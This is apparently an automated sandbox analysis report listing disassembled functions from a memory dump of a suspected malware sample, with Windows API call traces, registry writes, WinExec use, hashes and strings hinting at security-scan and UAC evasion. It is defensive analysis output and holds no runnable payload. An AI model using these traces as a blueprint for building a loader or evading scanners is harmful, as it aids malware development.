                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HandleModule$AddressProc$Exec
                                                                                                                                        • String ID: Kernel32$WinExec
                                                                                                                                        • API String ID: 2292790416-3609268280
                                                                                                                                        • Opcode ID: 6390aaa83181d64ee60667ce079112b60088029d50da4abab1c8cd4ab6b4ab87
                                                                                                                                        • Instruction ID: 60f7dc89d6dfa94b81e0e328dd66c740386e61c73c23fce1e347695617445af0
                                                                                                                                        • Opcode Fuzzy Hash: 6390aaa83181d64ee60667ce079112b60088029d50da4abab1c8cd4ab6b4ab87
                                                                                                                                        • Instruction Fuzzy Hash: E8F08134680608AFEB11FFA5DC41B5A77AEEB48710F628460B505DBB50D674AD009E34
                                                                                                                                        Function 02DE5BAC Relevance: 4.6, APIs: 3, Instructions: 105fileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02DE5CF4,?,?,02DE3880,00000001), ref: 02DE5C08
                                                                                                                                        • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02DE5CF4,?,?,02DE3880,00000001), ref: 02DE5C36
                                                                                                                                          • Part of subcall function 02DD7D10: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02DE3880,02DE5C76,00000000,02DE5CF4,?,?,02DE3880), ref: 02DD7D5E
                                                                                                                                          • Part of subcall function 02DD7F18: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02DE3880,02DE5C91,00000000,02DE5CF4,?,?,02DE3880,00000001), ref: 02DD7F37
                                                                                                                                        • GetLastError.KERNEL32(00000000,02DE5CF4,?,?,02DE3880,00000001), ref: 02DE5C9B
                                                                                                                                          • Part of subcall function 02DDA6F8: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,02DDC359,00000000,02DDC3B3), ref: 02DDA717
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 503785936-0
                                                                                                                                        • Opcode ID: df80bfd7a9ebdd114d6bf0bcb22105e729a5eb36dff786fa00afd3819a184277
                                                                                                                                        • Instruction ID: 2018db866ab716010897083e383d87027a5497c29bf7f0e11207d6503e7816b4
                                                                                                                                        • Opcode Fuzzy Hash: df80bfd7a9ebdd114d6bf0bcb22105e729a5eb36dff786fa00afd3819a184277
                                                                                                                                        • Instruction Fuzzy Hash: E9319F30A40A049FEB00EFA8D8807AEB7F6EB48304F908465E905AB380D7755D45CFB1
                                                                                                                                        Function 02DEE6B6 Relevance: 4.6, APIs: 3, Instructions: 59registryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyA.ADVAPI32(?,00000000,02F25914), ref: 02DEE6FC
                                                                                                                                        • RegSetValueExA.ADVAPI32(00000844,00000000,00000000,00000001,00000000,0000001C,00000000,02DEE767), ref: 02DEE734
                                                                                                                                        • RegCloseKey.ADVAPI32(00000844,00000844,00000000,00000000,00000001,00000000,0000001C,00000000,02DEE767), ref: 02DEE73F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseOpenValue
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 779948276-0
                                                                                                                                        • Opcode ID: 7c92a73d65c7673e682fa558b2d978d90932175e341ff737498e8e7f30c00bd0
                                                                                                                                        • Instruction ID: 32ec6034680c4521fe2b9acea3b6c53c5b2bf9888d0e7eef69d05edda6b7dd67
                                                                                                                                        • Opcode Fuzzy Hash: 7c92a73d65c7673e682fa558b2d978d90932175e341ff737498e8e7f30c00bd0
                                                                                                                                        • Instruction Fuzzy Hash: 87113D71600A08AFEB10FBA9D891A6E77ADEB09360F814464F505E7350D730EE418EB0
                                                                                                                                        Function 02DEE6B8 Relevance: 4.6, APIs: 3, Instructions: 58registryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyA.ADVAPI32(?,00000000,02F25914), ref: 02DEE6FC
                                                                                                                                        • RegSetValueExA.ADVAPI32(00000844,00000000,00000000,00000001,00000000,0000001C,00000000,02DEE767), ref: 02DEE734
                                                                                                                                        • RegCloseKey.ADVAPI32(00000844,00000844,00000000,00000000,00000001,00000000,0000001C,00000000,02DEE767), ref: 02DEE73F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseOpenValue
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 779948276-0
                                                                                                                                        • Opcode ID: 424f8d6bce7291b578b1bb315ad5e32ad0991008e2a4d1c1edf04cd867cc6e92
                                                                                                                                        • Instruction ID: 0c781d9e87bea57a3aed857e57d8d9c7d363b0a8d6f11970553071cac88cd039
                                                                                                                                        • Opcode Fuzzy Hash: 424f8d6bce7291b578b1bb315ad5e32ad0991008e2a4d1c1edf04cd867cc6e92
                                                                                                                                        • Instruction Fuzzy Hash: 91114F71600A08AFEB10FFA9D891A6E77ADEB09360F814464F505E7350D730EE418FB0
                                                                                                                                        Function 02DDE2E4 Relevance: 4.5, APIs: 3, Instructions: 45COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClearVariant
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1473721057-0
                                                                                                                                        • Opcode ID: 319a171880cb51b4d504a2298baeab0a28f43c4b4003e2900ddedcf78809e13c
                                                                                                                                        • Instruction ID: 679de7402a67a4489d20109f245c633c8e922b51d31b5b2813abfba752493cc1
                                                                                                                                        • Opcode Fuzzy Hash: 319a171880cb51b4d504a2298baeab0a28f43c4b4003e2900ddedcf78809e13c
                                                                                                                                        • Instruction Fuzzy Hash: 98F0CD21708A14CBDB207B39CDC4A79279ADF01B06F941426E4CA9F305CB24EC49CBB2
                                                                                                                                        Function 02DD4CFC Relevance: 4.5, APIs: 3, Instructions: 24memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SysFreeString.OLEAUT32(02DEE948), ref: 02DD4C1A
                                                                                                                                        • SysAllocStringLen.OLEAUT32(?,?), ref: 02DD4D07
                                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 02DD4D19
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: String$Free$Alloc
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 986138563-0
                                                                                                                                        • Opcode ID: 5a5438c59bf50d5a9d2d1f0a3350fd82e771d5cb0ff699e6fe957ce0256f5644
                                                                                                                                        • Instruction ID: 52ac6262c28fc40a52ff9f5291a7f3d47138b4585d7d63bd35ba23e51927eda1
                                                                                                                                        • Opcode Fuzzy Hash: 5a5438c59bf50d5a9d2d1f0a3350fd82e771d5cb0ff699e6fe957ce0256f5644
                                                                                                                                        • Instruction Fuzzy Hash: AAE012B8105A015EFB142F619C41F373B2AEFC2745F148899E804CA354D735CC41ED74
                                                                                                                                        Function 02DE705C Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 02DE735A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeString
                                                                                                                                        • String ID: H
                                                                                                                                        • API String ID: 3341692771-2852464175
                                                                                                                                        • Opcode ID: ed63be248e010efd669bbe3ec851019602575ec714c61f2681de143cebdb4f54
                                                                                                                                        • Instruction ID: c58a9aaf7cab76eb7397348d6110c52d8d01bce4b6578e2d479c7458cd4e4407
                                                                                                                                        • Opcode Fuzzy Hash: ed63be248e010efd669bbe3ec851019602575ec714c61f2681de143cebdb4f54
                                                                                                                                        • Instruction Fuzzy Hash: F2B1D074A01608AFEB51DF99E880A9DFBF2FF49314F248169E856AB360D731AC45CF50
                                                                                                                                        Function 02DDE6E0 Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • VariantCopy.OLEAUT32(00000000,00000000), ref: 02DDE701
                                                                                                                                          • Part of subcall function 02DDE2E4: VariantClear.OLEAUT32(?), ref: 02DDE2F3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Variant$ClearCopy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 274517740-0
                                                                                                                                        • Opcode ID: c914504aa464ed615f118031a5f5092f2e4e9650012f11a13161e922ed2ddde7
                                                                                                                                        • Instruction ID: fb7e3c2e4656a12df84089af5f600c3e49469dafdef517419b02889415d74ff9
                                                                                                                                        • Opcode Fuzzy Hash: c914504aa464ed615f118031a5f5092f2e4e9650012f11a13161e922ed2ddde7
                                                                                                                                        • Instruction Fuzzy Hash: B511A524740E10A7CB70AF69C8C4A6677EBEF45751B844426E68A8F345DB30DC41CAB1
                                                                                                                                        Function 02DD15CC Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 38memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02DD1A03,?,02DD2000), ref: 02DD15E2
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                        • String ID: 0`
                                                                                                                                        • API String ID: 4275171209-3339448193
                                                                                                                                        • Opcode ID: f06750dd28f04c11a40e903c666a21d5df83babe982ad83295fc43f2392ee528
                                                                                                                                        • Instruction ID: 1610e40b1e490f0ced066a571c44955a5ed353119d5923af8839f0c65cdc47e9
                                                                                                                                        • Opcode Fuzzy Hash: f06750dd28f04c11a40e903c666a21d5df83babe982ad83295fc43f2392ee528
                                                                                                                                        • Instruction Fuzzy Hash: CDF06DF0B813004FEB15CFBA99453517BD2E789344F59C579D70ADB388E7B1A8498B10
                                                                                                                                        Function 02DDE37C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitVariant
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1927566239-0
                                                                                                                                        • Opcode ID: 27cc8e6cb317cd37fb1058177ccdb6d6d6215684448ef56cc5efc11c45f90d7b
                                                                                                                                        • Instruction ID: 2849f6e4fe2a3f6d3806697648303064cb5ce40ef009ad92e58b51e6629b95a6
                                                                                                                                        • Opcode Fuzzy Hash: 27cc8e6cb317cd37fb1058177ccdb6d6d6215684448ef56cc5efc11c45f90d7b
                                                                                                                                        • Instruction Fuzzy Hash: 20315E72A00A18ABDB10EFACD884ABA77ACFB0D305F444565E945DB340D370ED94CBA1
                                                                                                                                        Function 02DE6CEC Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CLSIDFromProgID.OLE32(00000000,?,00000000,02DE6D39,?,?,?,00000000), ref: 02DE6D19
                                                                                                                                          • Part of subcall function 02DD4C0C: SysFreeString.OLEAUT32(02DEE948), ref: 02DD4C1A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeFromProgString
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4225568880-0
                                                                                                                                        • Opcode ID: 5d102e98c5d0c24ef33502b445b9848cf327b15ec6e8ae26395472f56d5957c2
                                                                                                                                        • Instruction ID: 4621fbeb45446de818686b44729f44dcbb8aab023662db5b6d5b8f2d8267b03c
                                                                                                                                        • Opcode Fuzzy Hash: 5d102e98c5d0c24ef33502b445b9848cf327b15ec6e8ae26395472f56d5957c2
                                                                                                                                        • Instruction Fuzzy Hash: 94E06535604708BFE711FBA5DC5195E77ADDB49B10F910471E801D7700D6759D048CB0
                                                                                                                                        Function 02DD5814 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetModuleFileNameA.KERNEL32(02DD0000,?,00000105), ref: 02DD5832
                                                                                                                                          • Part of subcall function 02DD5A78: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02DD0000,02DFD790), ref: 02DD5A94
                                                                                                                                          • Part of subcall function 02DD5A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02DD0000,02DFD790), ref: 02DD5AB2
                                                                                                                                          • Part of subcall function 02DD5A78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02DD0000,02DFD790), ref: 02DD5AD0
                                                                                                                                          • Part of subcall function 02DD5A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02DD5AEE
                                                                                                                                          • Part of subcall function 02DD5A78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02DD5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02DD5B37
                                                                                                                                          • Part of subcall function 02DD5A78: RegQueryValueExA.ADVAPI32(?,02DD5CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02DD5B7D,?,80000001), ref: 02DD5B55
                                                                                                                                          • Part of subcall function 02DD5A78: RegCloseKey.ADVAPI32(?,02DD5B84,00000000,?,?,00000000,02DD5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02DD5B77
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2796650324-0
                                                                                                                                        • Opcode ID: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                                                                                                                                        • Instruction ID: 0264bb682c22fa32e9b08e7b9f87a47b14b79c78c03fd4e14ccf0bd99a39f317
                                                                                                                                        • Opcode Fuzzy Hash: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                                                                                                                                        • Instruction Fuzzy Hash: DBE06571A006248BCB10DE68D8C0A8637D9AB08754F8409A5EC58DF34AD3B0ED208BE0
                                                                                                                                        Function 02DD7D94 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02DD7DA8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileWrite
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3934441357-0
                                                                                                                                        • Opcode ID: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
                                                                                                                                        • Instruction ID: 3ac922f07d5741418682f5b0325deff6ab537525ace33e74d7287ebd256ceaeb
                                                                                                                                        • Opcode Fuzzy Hash: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
                                                                                                                                        • Instruction Fuzzy Hash: 01D012762085506AE220955A6C44EAB5ADCCBC9770F100679B658C2280D6208C0586B1
                                                                                                                                        Function 02DD7E10 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetFileAttributesA.KERNEL32(00000000,?,02DEF8C4,ScanString,02E3137C,02DFAFD0,OpenSession,02E3137C,02DFAFD0,ScanString,02E3137C,02DFAFD0,UacScan,02E3137C,02DFAFD0,UacInitialize), ref: 02DD7E1B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AttributesFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                        • Opcode ID: 23fb81311ad07fae81732db0edde70c56cded36c5311baf0953a0f48c8330ef0
                                                                                                                                        • Instruction ID: 3b4232bfe19669211510a0ffe62e65c03c0a08fa268b88d444d0fa76cf4abfe2
                                                                                                                                        • Opcode Fuzzy Hash: 23fb81311ad07fae81732db0edde70c56cded36c5311baf0953a0f48c8330ef0
                                                                                                                                        • Instruction Fuzzy Hash: 8CC08CE0202A030A2A50A1FC1CC482A428C89042387A42FA1E238DA3E2D321CC676830
                                                                                                                                        Function 02DD7E34 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetFileAttributesA.KERNEL32(00000000,?,02DF2A41,ScanString,02E3137C,02DFAFD0,OpenSession,02E3137C,02DFAFD0,ScanBuffer,02E3137C,02DFAFD0,OpenSession,02E3137C,02DFAFD0,Initialize), ref: 02DD7E3F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
